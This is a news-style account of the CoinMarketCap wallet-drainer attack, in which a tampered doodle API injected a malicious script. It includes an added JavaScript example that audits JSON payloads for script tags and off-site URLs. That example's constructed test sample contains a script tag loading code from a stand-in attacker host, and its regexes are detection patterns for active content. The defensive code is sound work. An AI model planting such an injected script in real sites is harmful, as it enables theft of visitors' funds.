The popular cryptocurrency price tracking site CoinMarketCap suffered a serious website supply chain attack that exposed its many visitors to a wallet drainer campaign designed to steal their cryptocurrency. On Friday evening, visitors began seeing Web3 popups asking them to connect their crypto wallets. When visitors connected their wallets, a malicious script proceeded to drain all the cryptocurrency from them.
The company later confirmed that threat actors had exploited a vulnerability in the site’s homepage “doodle” image. The attackers modified the API that the site uses to retrieve the doodle image shown on the homepage. The tampered API payload included a malicious script tag, which injected a wallet drainer into the site. When someone visited the page, the script would execute and display a fake wallet connect popup.
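The following is an added example, not code from CoinMarketCap or from the original article: one way a site could audit a JSON payload, such as a doodle API response, for script tags and off-site URLs before rendering it into the page. The payload shape, field names and host names are constructed assumptions.

```javascript
// Added example: audit a JSON payload that the page will render as markup.
// The payload shape and host names below are constructed for illustration.
const ALLOWED_HOSTS = new Set(["static.example.com"]); // assumption: site's own asset host

const ACTIVE_CONTENT = [
  { name: "script-tag", re: /<\s*script\b/i },
  { name: "event-handler", re: /<[^>]+\son[a-z]+\s*=/i },
  { name: "javascript-url", re: /javascript\s*:/i },
  { name: "embed-tag", re: /<\s*(iframe|object|embed)\b/i },
];

function offHostUrls(text) {
  const urls = text.match(/https?:\/\/[^\s"'<>)]+/gi) || [];
  return urls.filter((u) => {
    try { return !ALLOWED_HOSTS.has(new URL(u).hostname); }
    catch { return true; } // unparseable URL: treat as suspicious
  });
}

// Recursively walk the payload and report every string field that carries
// active content or references a host outside the allowlist.
function auditPayload(node, path = "$", findings = []) {
  if (typeof node === "string") {
    for (const { name, re } of ACTIVE_CONTENT) {
      if (re.test(node)) findings.push({ path, issue: name });
    }
    for (const url of offHostUrls(node)) {
      findings.push({ path, issue: "off-allowlist-url", url });
    }
  } else if (Array.isArray(node)) {
    node.forEach((v, i) => auditPayload(v, `${path}[${i}]`, findings));
  } else if (node && typeof node === "object") {
    for (const [k, v] of Object.entries(node)) auditPayload(v, `${path}.${k}`, findings);
  }
  return findings;
}

// Constructed sample payloads (not the real API response).
const cleanDoodle = { doodle: { image: "https://static.example.com/doodle.png", alt: "Doodle" } };
const tamperedDoodle = {
  doodle: {
    image: "https://static.example.com/doodle.png",
    caption: '<img src="x"><script src="https://cdn.attacker.invalid/d.js"></script>',
  },
};

console.log(auditPayload(cleanDoodle));
console.log(auditPayload(tamperedDoodle));
```

A check like this is a tripwire for monitoring or a pre-render gate; it complements, and does not replace, rendering API data as inert text and enforcing a Content Security Policy.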
More details about the attack later came from a threat actor known as “Rey.”
He said the attackers shared a screenshot of the drainer’s control panel on a popular Telegram channel. The panel indicated that over forty-three thousand dollars was stolen from one hundred ten different victims, confirming the financial impact of the supply chain attack. The actors were speaking French on Telegram.
As the popularity of cryptocurrency has boomed, so has the significant threat from wallet drainers.
These attacks are most often promoted through social media posts, online advertisements, and spoofed websites. Recent industry reports indicate that wallet drainers stole almost five hundred million dollars in 2024. The problem has become so pervasive that Mozilla recently introduced a new system to detect them.